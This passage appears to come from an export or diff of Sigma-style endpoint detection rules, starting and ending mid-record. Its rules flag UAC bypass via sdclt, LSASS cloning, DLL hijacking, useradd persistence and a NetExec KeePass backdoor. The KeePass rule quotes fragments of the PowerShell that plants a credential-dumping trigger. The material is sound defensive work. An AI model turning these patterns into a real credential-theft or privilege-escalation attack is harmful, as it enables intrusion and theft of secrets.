"rule_level_override": null, + "rule_id": "0070bcf5-0b6e-40f9-9b07-baad4a18cf84", + "rule_name": "Files Accessed via Raw Device Access", + "rule_description": "Detects raw access to files through tools like RawCopy or FGET.\nAttackers can raw access files to dump them and evade detection mechanisms, as well as bypass locked files.\nIt is recommended to investigate the command-line arguments to check which file was accessed and to analyze the parent process for suspicious activities.\n", + "rule_creation_date": "2022-10-19", + "rule_modified_date": "2026-02-11", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion" + ], + "rule_technique_tags": [ + "attack.t1006" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "008189c4-a1fb-4a50-86ed-a178011f9cc2", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.077824Z", + "creation_date": "2026-03-23T11:45:34.077826Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.077830Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + 
"https://pentestlab.blog/2017/06/09/uac-bypass-sdclt/", + "https://attack.mitre.org/techniques/T1548/002/" + ], + "name": "t1548_002_post_uac_bypass_sdclt.yml", + "content": "title: UAC Bypass Executed via sdclt\nid: 008189c4-a1fb-4a50-86ed-a178011f9cc2\ndescription: |\n Detects an unusual process being spawned by sdclt.exe.\n This is action is probably the result of a UAC bypass attempt, prepared by setting specific values in thre registry.\n Adversaries may bypass UAC mechanisms to elevate process privileges on a system to perform a task under administrator-level permissions.\n It is recommended to investigate the detected process and its execution context to determine its legitimacy.\nreferences:\n - https://pentestlab.blog/2017/06/09/uac-bypass-sdclt/\n - https://attack.mitre.org/techniques/T1548/002/\ndate: 2020/10/12\nmodified: 2025/02/05\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1548.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.UACBypass\n - classification.Windows.Behavior.Hijacking\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n ParentImage|endswith: '\\sdclt.exe'\n\n filter_common:\n Image:\n - '?:\\Windows\\System32\\sdclt.exe'\n - '?:\\Windows\\System32\\control.exe'\n - '?:\\Windows\\System32\\recdisc.exe'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "008189c4-a1fb-4a50-86ed-a178011f9cc2", + "rule_name": "UAC Bypass Executed via sdclt", + "rule_description": "Detects an unusual process being spawned by sdclt.exe.\nThis is action is probably the result of a UAC bypass attempt, prepared by setting specific values in thre registry.\nAdversaries may bypass UAC mechanisms to elevate process privileges on a system to perform a task under 
administrator-level permissions.\nIt is recommended to investigate the detected process and its execution context to determine its legitimacy.\n", + "rule_creation_date": "2020-10-12", + "rule_modified_date": "2025-02-05", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.privilege_escalation" + ], + "rule_technique_tags": [ + "attack.t1548.002" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "00a9c87a-2497-4d37-878f-7cb8f3560972", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "critical", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.091095Z", + "creation_date": "2026-03-23T11:45:34.091097Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.091102Z", + "rule_level": "critical", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://github.com/Pennyw0rth/NetExec/blob/1af282888cd514cf9b4a08ff7caeb26c64625d90/nxc/data/keepass_trigger_module/AddKeePassTrigger.ps1", + "https://attack.mitre.org/techniques/T1555/005/", + "https://attack.mitre.org/techniques/T1059/001/" + ], + "name": "t1555_005_netexec_keepass.yml", + "content": "title: KeePass Backdoored via NetExec\nid: 
00a9c87a-2497-4d37-878f-7cb8f3560972\ndescription: |\n Detects a dump of a KeePass database made using the NetExec tools.\n NetExec is a tool intended to ease lateral movement, internal recon and credential gathering actions.\n It is recommended to investigate actions made by the child process and identify the source of the remote connection using authentication logs.\nreferences:\n - https://github.com/Pennyw0rth/NetExec/blob/1af282888cd514cf9b4a08ff7caeb26c64625d90/nxc/data/keepass_trigger_module/AddKeePassTrigger.ps1\n - https://attack.mitre.org/techniques/T1555/005/\n - https://attack.mitre.org/techniques/T1059/001/\ndate: 2024/07/23\nmodified: 2025/01/15\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1555.005\n - attack.execution\n - attack.t1059.001\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.HackTool.NetExec\n - classification.Windows.Behavior.CredentialAccess\n - classification.Windows.Behavior.Exfiltration\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n selection_add:\n PowershellCommand|contains|all:\n - '$Null = $KeePassXML.Configuration.Application.TriggerSystem.Triggers.AppendChild($KeePassXML.ImportNode($TriggerXML.Trigger, $True))'\n - \"$Null = $KeePassXML.Configuration.Application.TriggerSystem.ReplaceChild($Triggers, $KeePassXML.Configuration.Application.TriggerSystem.SelectSingleNode('Triggers'))\"\n - 'bES7XfGLTA2IzmXm6a0pig=='\n - 'D5prW87VRr65NO2xP5RIIg=='\n selection_remove:\n PowershellCommand|contains|all:\n - '$KeePassXML.Configuration.Application.TriggerSystem.Triggers.RemoveChild($Child)'\n - '$Children = $KeePassXML.Configuration.Application.TriggerSystem.Triggers | ForEach-Object {$_.Trigger} | Where-Object {$_.Name -like $TriggerName}'\n - \"if($KeePassXMLPath -and ($KeePassXMLPath -match '.\\\\.xml$') -and (Test-Path -Path $KeePassXMLPath) ) {\"\n selection_restart:\n PowershellCommand|contains|all:\n - \"if($KeePassXMLPath -and ($KeePassXMLPath -match 
'.\\\\.xml$') -and (Test-Path -Path $KeePassXMLPath) ) {\"\n - 'taskkill /F /T /IM keepass.exe /FI \"USERNAME eq $KeePassUser\"'\n condition: 1 of selection_*\nlevel: critical\nconfidence: strong", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "00a9c87a-2497-4d37-878f-7cb8f3560972", + "rule_name": "KeePass Backdoored via NetExec", + "rule_description": "Detects a dump of a KeePass database made using the NetExec tools.\nNetExec is a tool intended to ease lateral movement, internal recon and credential gathering actions.\nIt is recommended to investigate actions made by the child process and identify the source of the remote connection using authentication logs.\n", + "rule_creation_date": "2024-07-23", + "rule_modified_date": "2025-01-15", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.credential_access", + "attack.execution" + ], + "rule_technique_tags": [ + "attack.t1059.001", + "attack.t1555.005" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "00d0b7b5-b0af-4d67-8658-5a08f0acf307", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.618852Z", + 
"creation_date": "2026-03-23T11:45:34.618854Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.618858Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://github.com/xforcered/WFH", + "https://securityintelligence.com/posts/windows-features-dll-sideloading/", + "https://attack.mitre.org/techniques/T1574/001/" + ], + "name": "t1574_001_dll_hijacking_infdefaultinstall.yml", + "content": "title: DLL Hijacking via InfDefaultInstall.exe\nid: 00d0b7b5-b0af-4d67-8658-5a08f0acf307\ndescription: |\n Detects potential Windows DLL Hijacking via InfDefaultInstall.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://github.com/xforcered/WFH\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'InfDefaultInstall.EXE'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\drvstore.dll'\n - '\\newdev.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n 
filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "00d0b7b5-b0af-4d67-8658-5a08f0acf307", + "rule_name": "DLL Hijacking via InfDefaultInstall.exe", + "rule_description": "Detects potential Windows DLL Hijacking via InfDefaultInstall.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", + "rule_creation_date": "2022-09-15", + "rule_modified_date": "2025-07-11", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation" + ], + "rule_technique_tags": [ + "attack.t1574.001" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "00ecf213-801a-4ee0-b19d-fbe12001d4a3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "low", + "rule_effective_confidence": "weak", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": 
"b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-24T07:14:08.719555Z", + "creation_date": "2026-03-23T11:45:34.612526Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.612534Z", + "rule_level": "low", + "rule_confidence": "weak", + "rule_confidence_override": null, + "references": [ + "https://research.checkpoint.com/2022/apt35-exploits-log4j-vulnerability-to-distribute-new-modular-powershell-toolkit/", + "https://attack.mitre.org/techniques/T1136/001/" + ], + "name": "t1136_001_useradd_linux.yml", + "content": "title: User Created via useradd\nid: 00ecf213-801a-4ee0-b19d-fbe12001d4a3\ndescription: |\n Detects an attempt to create a new user using the useradd utility.\n Adversaries may create new users to hide their activity or achieve persistence.\n It is recommended to investigate whether the process has legitimate reasons to create a user as well as to look for possible suspicious activities on the host.\nreferences:\n - https://research.checkpoint.com/2022/apt35-exploits-log4j-vulnerability-to-distribute-new-modular-powershell-toolkit/\n - https://attack.mitre.org/techniques/T1136/001/\ndate: 2023/01/03\nmodified: 2026/03/23\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1136.001\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Behavior.AccountManipulation\n - classification.Linux.Behavior.Persistence\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n Image|endswith: '/useradd'\n exclusion_dpkg:\n - ProcessImage: '/usr/bin/dpkg'\n - ProcessParentImage: '/usr/bin/dpkg'\n - ProcessGrandparentImage: '/usr/bin/dpkg'\n exclusion_dpkg_cmds_bin:\n - ProcessCommandLine|contains: '/usr/bin/dpkg-'\n - ProcessParentCommandLine|contains: 
'/usr/bin/dpkg-'\n - ProcessGrandparentCommandLine|contains: '/usr/bin/dpkg-'\n exclusion_dpkg_cmds_sbin:\n - ProcessCommandLine|contains: '/usr/sbin/dpkg-'\n - ProcessParentCommandLine|contains: '/usr/sbin/dpkg-'\n - ProcessGrandparentCommandLine|contains: '/usr/sbin/dpkg-'\n exclusion_apt:\n - ProcessImage: '/usr/bin/apt'\n - ProcessParentImage: '/usr/bin/apt'\n - ProcessGrandparentImage: '/usr/bin/apt'\n exclusion_yum:\n - ProcessCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n - '/usr/bin/python -Estt /usr/local/psa/bin/yum_install ' # Plesk'\n - ProcessParentCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n - ProcessGrandparentCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n exclusion_rpm:\n - ProcessParentCommandLine|startswith: '/bin/sh /var/tmp/rpm-tmp.'\n - ProcessGrandparentCommandLine|startswith: '/bin/sh /var/tmp/rpm-tmp.'\n\n exclusion_debconf:\n - ProcessCommandLine|contains: '/usr/bin/debconf'\n - ProcessParentCommandLine|contains: '/usr/bin/debconf'\n - ProcessGrandparentCommandLine|contains: '/usr/bin/debconf'\n exclusion_dpkg_postinstall:\n - ProcessCommandLine|contains: '/var/lib/dpkg/info/*.postinst configure'\n - ProcessParentCommandLine|contains: '/var/lib/dpkg/info/*.postinst configure'\n - ProcessGrandparentCommandLine|contains: '/var/lib/dpkg/info/*.postinst configure'\n\n # This command is different on debian distros\n exclusion_nxlog_redhat:\n ProcessCommandLine: 'useradd -r -g nxlog -d 
/var/spool/nxlog -s /sbin/nologin -c user for the nxlog log managment tool nxlog'\n\n exclusion_ossec:\n ProcessParentImage: '/var/ossec/bin/wazuh-modulesd'\n\n exclusion_puppet:\n ProcessParentImage: '/opt/puppetlabs/puppet/bin/ruby'\n\n exclusion_aws:\n ProcessCommandLine: '/bin/bash /var/lib/cloud/instance/scripts/part-001'\n\n exclusion_template_ansible:\n - ProcessCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/AnsiballZ_*.py'\n - ProcessParentCommandLine:\n - '/bin/sh -c /usr/bin/python* && sleep 0'\n - '/bin/sh -c /usr/libexec/platform-python && sleep 0'\n - '/bin/sh -c LANG=C /usr/bin/python* && sleep 0'\n - '/bin/sh -c LANG=C /usr/libexec/platform-python && sleep 0'\n - ProcessParentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentCommandLine:\n - '/bin/sh -c /usr/bin/python* && sleep 0'\n - '/bin/sh -c /usr/libexec/platform-python && sleep 0'\n - '/bin/sh -c LANG=C /usr/bin/python* && sleep 0'\n - '/bin/sh -c LANG=C /usr/libexec/platform-python && sleep 0'\n - ProcessGrandparentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentParentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentGrandparentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? 
; '\n\n exclusion_edutice:\n # useradd -p -s /bin/bash -b /home/external -g edutice-external -m --badname\n - ProcessCommandLine|contains: ' -g edutice-external '\n ProcessGrandparentCommandLine: '/usr/bin/python3 /usr/lib/edutice/service/main.py'\n - ProcessCommandLine|contains: ' -g edutice-external '\n ProcessParentCommandLine: '/usr/bin/python3 /usr/lib/edutice/service/main.py'\n\n exclusion_containers:\n Ancestors|contains:\n - '/usr/bin/podman'\n - '/usr/bin/containerd-shim'\n - '/usr/bin/containerd-shim-runc-v2'\n - '/usr/bin/dockerd'\n - '/usr/sbin/dockerd'\n - '/usr/local/bin/dockerd'\n - '/usr/local/bin/docker-init'\n - '/usr/bin/dockerd-current'\n - '/usr/sbin/dockerd-current'\n - '/usr/bin/containerd'\n - '/usr/local/bin/containerd'\n - '/var/lib/rancher/k3s/data/*/bin/containerd'\n - '/var/lib/rancher/rke2/data/*/bin/containerd'\n - '/snap/docker/*/bin/dockerd'\n - '/snap/microk8s/*/bin/containerd'\n - '/usr/bin/dockerd-ce'\n\n condition: selection and not 1 of exclusion_*\nlevel: low\nconfidence: weak\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "00ecf213-801a-4ee0-b19d-fbe12001d4a3", + "rule_name": "User Created via useradd", + "rule_description": "Detects an attempt to create a new user using the useradd utility.\nAdversaries may create new users to hide their activity or achieve persistence.\nIt is recommended to investigate whether the process has legitimate reasons to create a user as well as to look for possible suspicious activities on the host.\n", + "rule_creation_date": "2023-01-03", + "rule_modified_date": "2026-03-23", + "rule_os": "linux", + "rule_status": null, + "rule_tactic_tags": [ + "attack.persistence" + ], + "rule_technique_tags": [ + "attack.t1136.001" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "00ff5814-36a0-4bb9-8426-599b30b414a1", + "test_maturity_current_count": 0, + 
"test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "critical", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.094659Z", + "creation_date": "2026-03-23T11:45:34.094661Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.094665Z", + "rule_level": "critical", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://github.com/deepinstinct/Dirty-Vanity", + "https://gist.github.com/GeneralTesler/68903f7eb00f047d32a4d6c55da5a05c", + "https://attack.mitre.org/techniques/T1055/" + ], + "name": "t1003_001_lsass_clone_using_process_reflection.yml", + "content": "title: Possible LSASS Reflection via Windows Fork API\nid: 00ff5814-36a0-4bb9-8426-599b30b414a1\ndescription: |\n Detects the reflection of a Windows process using the Windows fork API.\n Attackers can use process forking to inject processes with shellcodes while evading detection since the modified process is the cloned one.\n This technique can be used to hide malicious tasks inside legitimate processes as well as silently dump LSASS' memory for credential access and privilege escalation.\n It is recommended to investigate the process that performed this action to determine its legitimacy.\nreferences:\n - https://github.com/deepinstinct/Dirty-Vanity\n - 
https://gist.github.com/GeneralTesler/68903f7eb00f047d32a4d6c55da5a05c\n - https://attack.mitre.org/techniques/T1055/\ndate: 2023/01/04\nmodified: 2025/01/31\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1055\n - attack.credential_access\n - attack.t1003.001\n - classification.Windows.Source.Thread\n - classification.Windows.Behavior.CredentialAccess\n - classification.Windows.Behavior.PrivilegeEscalation\n - classification.Windows.Behavior.LSASSAccess\nlogsource:\n product: windows\n category: remote_thread\ndetection:\n selection:\n TargetImage|endswith: '\\lsass.exe'\n StartFunction|contains: 'RtlCreateProcessReflection'\n\n exclusion_werfault:\n ProcessImage:\n - '?:\\Windows\\System32\\WerFault.exe'\n - '?:\\Windows\\syswow64\\WerFault.exe'\n ProcessParentCommandLine: '?:\\Windows\\System32\\svchost.exe -k WerSvcGroup'\n\n exclusion_rdrleakdiag:\n # C:\\WINDOWS\\system32\\RdrLeakDiag.exe -p 10768 -h 25 -tp 2 -cleanup -watson -unnamed -wait 240\n ProcessImage:\n - '?:\\Windows\\System32\\rdrleakdiag.exe'\n - '?:\\Windows\\syswow64\\rdrleakdiag.exe'\n ProcessCommandLine|contains|all:\n - 'RdrLeakDiag.exe'\n - '-cleanup'\n - '-watson'\n - '-unnamed'\n\n condition: selection and not 1 of exclusion_*\nlevel: critical\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "00ff5814-36a0-4bb9-8426-599b30b414a1", + "rule_name": "Possible LSASS Reflection via Windows Fork API", + "rule_description": "Detects the reflection of a Windows process using the Windows fork API.\nAttackers can use process forking to inject processes with shellcodes while evading detection since the modified process is the cloned one.\nThis technique can be used to hide malicious tasks inside legitimate processes as well as silently dump LSASS' memory for credential access and privilege escalation.\nIt is recommended to investigate the process that performed this action to determine its 
legitimacy.\n", + "rule_creation_date": "2023-01-04", + "rule_modified_date": "2025-01-31", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.credential_access", + "attack.privilege_escalation" + ], + "rule_technique_tags": [ + "attack.t1003.001", + "attack.t1055" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "01198d94-cc61-455c-9bd1-37096dd366f1", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.623301Z", + "creation_date": "2026-03-23T11:45:34.623303Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.623307Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://www.elastic.co/security-labs/unmasking-financial-services-intrusion-ref0657", + "https://learn.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-search-order", + "https://attack.mitre.org/techniques/T1574/001/" + ], + "name": "t1574_001_unsigned_msvcp140.yml", + "content": "title: Unsigned msvcp140.dll DLL Loaded\nid: 01198d94-cc61-455c-9bd1-37096dd366f1\ndescription: |\n Detects a suspicious unsigned DLL named 'msvcp140.dll' loaded by 
a process that could be the target to DLL hijacking.\n Adversaries may execute their own malicious payloads by planting a DLL in a specific path to exploit the Windows DLL search order.\n It is recommended to investigate the behavior of the process loading the DLL to identify any suspicious activity, as well as to analyze the DLL itself for malicious content.\nreferences:\n - https://www.elastic.co/security-labs/unmasking-financial-services-intrusion-ref0657\n - https://learn.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-search-order\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2024/07/23\nmodified: 2026/02/10\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ImageLoaded|endswith: '\\msvcp140.dll'\n sha256|contains: '?' 
# at least one character, some SHA256 are empty\n\n filter_signed:\n Signed: 'true'\n\n filter_commonfolders:\n ImageLoaded|startswith:\n - '?:\\Windows\\WinSxS\\'\n - '?:\\Windows\\System32\\DriverStore\\'\n - '?:\\Windows\\System32\\msvcp140.dll'\n - '?:\\Windows\\syswow64\\msvcp140.dll'\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n\n filter_known_sha256:\n sha256:\n - '1e57a6df9e3742e31a1c6d9bff81ebeeae8a7de3b45a26e5079d5e1cce54cd98'\n - 'f7ba518cb961853ec35c7bb159054983fc006fdfbb6b1c360720eb52fefb3d38'\n - 'b7278da3da769bff80ecf19d0f36ad1716da7f6c77f625c08d185ad302b200d0'\n - 'ef27a68bdc1ee3d5d9a6a720b656bfb7604a8fac6aceb245a6eadc2788686d9f'\n - '557d76338488e28c7761dfe5ee4fa722f65f0c945563002e86de09c95f02b2aa'\n - '75fc76655631a4ae72d015b8e85f899537c603661ca35a3f29099b8e4c84716c'\n - '74892d9b4028c05debaf0b9b5d9dc6d22f7956fa7d7eee00c681318c26792823'\n - '87a9e61e428632177c0292390d125da8e5c996cc0d1d619045ee041ce3bd9147'\n - '9e16ea4679e3c5780b2fdeea251e258bef968631137a40f93fcad6ee551108df'\n - 'd3151f653af88d88994dd66e30e3a184ba347e57a7c3ca909c2a9d4b5b6084fc'\n - '875f236424f59a82c9311930097c7e6073242fee66a60c38eec79b827d6e924c'\n - '006a73b6c5b31cc85974873a694e81e3d213ec493323b04607bcdaba0d6115eb'\n - '85aa8c8ab4cbf1ff9ae5c7bde1bf6da2e18a570e36e2d870b88536b8658c5ba8'\n - '115327d2c7fe87aa39a32bf3fd27e3cff32b9f4bb80f31e426b30148820aa220'\n - 'b9e8377a03ef104122a416f968b05133739f2f2a6c4b83c190723d7d780ebad3'\n - 'c09b126e7d4c1e6efb3ffcda2358252ce37383572c78e56ca97497a7f7c793e4'\n - '65ee0e7864cc6b2d8fd81b4cdf32bc900b74fdf04149587a8987f11f57966c86'\n - 'e7f59bc871613f960e61aa111ceb2f6de0650f79878d9e2141c646a51bdf97b0'\n - '8bd47bbc5cf773fa44ba38a20dbd3353970353cb99eda9238e4af92383fab8f9'\n\n filter_knownimphash:\n Imphash:\n - '2ba11fd5a511c8a409e705e9ab6b5dc1'\n - 'adf99b9ea3a1f76c33522f96772bc4dd'\n - 'a14a54183892ac75415d5e2bb2ac7208'\n - '01c801a34c4715440ef1f25ad689b315'\n - '54c174302c3213f3e59e692f8b5c58e5'\n - 
